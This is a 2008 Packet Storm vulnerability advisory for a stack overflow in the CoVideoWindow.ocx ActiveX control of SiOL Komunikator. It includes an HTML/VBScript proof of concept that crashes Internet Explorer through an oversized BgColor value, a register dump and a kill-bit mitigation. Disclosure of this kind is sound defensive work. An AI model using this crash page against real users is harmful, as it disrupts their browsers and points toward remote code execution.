siol-overflow.txt

2008-07-29T00:00:00
ID PACKETSTORM:68599
Type packetstorm
Reporter Edi Strosar
Modified 2008-07-29T00:00:00

Description

                                        
                                            `=========================================================================  
  
SiOL komunikator IM ActiveX stack overflow condition  
  
=========================================================================  
  
Release date: 30.7.2008  
Severity: Moderately critical  
Impact: Stack overflow  
Remote: Yes  
Status: Unpatched  
Software: SiOL Komunikator v1.3 (SLO_71130)  
Tested on: Microsoft Windows XP SP3 / IE6 SP3  
Developer: http://www.siol.net/  
http://www.eyeball.com/  
Disclosed by: Edi Strosar  
  
  
Vendor's description of affected application:  
=============================================  
"SiOL komunikator je programska oprema za neposredno sporoèanje, ki podpira celovito komuniciranje s tekstovnimi sporoèili, izmenjavo datotek ter možnostjo glasovnih in video klicev, brez telefonskega aparata in s katerekoli lokacije, kjer je omogoèena povezava v Internet."  
  
English translation (sort of):  
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP.  
  
Download link:  
http://www.siol.net/spletne_storitve/siol_komunikator.aspx  
  
  
ActiveX control overview:  
=========================  
Developer: Eyeball Networks, Inc.  
Version: 5.0.907.1  
Component: CoVideoWindow.ocx  
GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}  
RegKey Safe for Script: False  
RegKey Safe for Init: False  
Implements IObjectSafety: True  
KillBitSet: False  
  
  
Description:  
============  
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to stack overflow condition in BgColor() method which may lead to remote code execution. The vulnerability could be exploited if user with SiOL komunikator installed visits a specialy crafted web page.  
  
  
Proof of concept:  
=================  
Following testcase will crash Internet Explorer:  
  
<html>  
<object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>  
<input language=VBScript onclick=buffero() type=button value="Crash">  
<script language = 'vbscript'>  
Sub buffero()  
  
crash = String(515000, unescape("%41"))  
test.BgColor = crash  
End Sub  
  
</script>  
</html>  
  
Note: close all Internet Explorer instances before executing PoC!  
  
Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.  
  
  
Exception overview:  
===================  
----------------------------------------------------------------  
Exception C00000FD (STACK_OVERFLOW)  
----------------------------------------------------------------  
EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??  
ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01  
EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02  
ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00  
EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00  
EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B  
--> TEST [ECX],EAX  
----------------------------------------------------------------  
  
  
Mitigation:  
===========  
Set the kill bit (http://support.microsoft.com/kb/240797).  
  
Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.  
  
Windows Registry Editor Version 5.00  
  
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]  
"Compatibility Flags"=dword:00000400  
  
  
Timeline:  
=========  
12.07.2008 - initial developer notification  
- no response  
20.07.2008 - additional developer notification  
- no response  
30.07.2008 - public disclosure  
  
  
Contact:  
========  
edi [dot] strosar [at] gmail [dot] com  
  
  
Disclaimer:  
===========  
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.  
  
=========================================================================`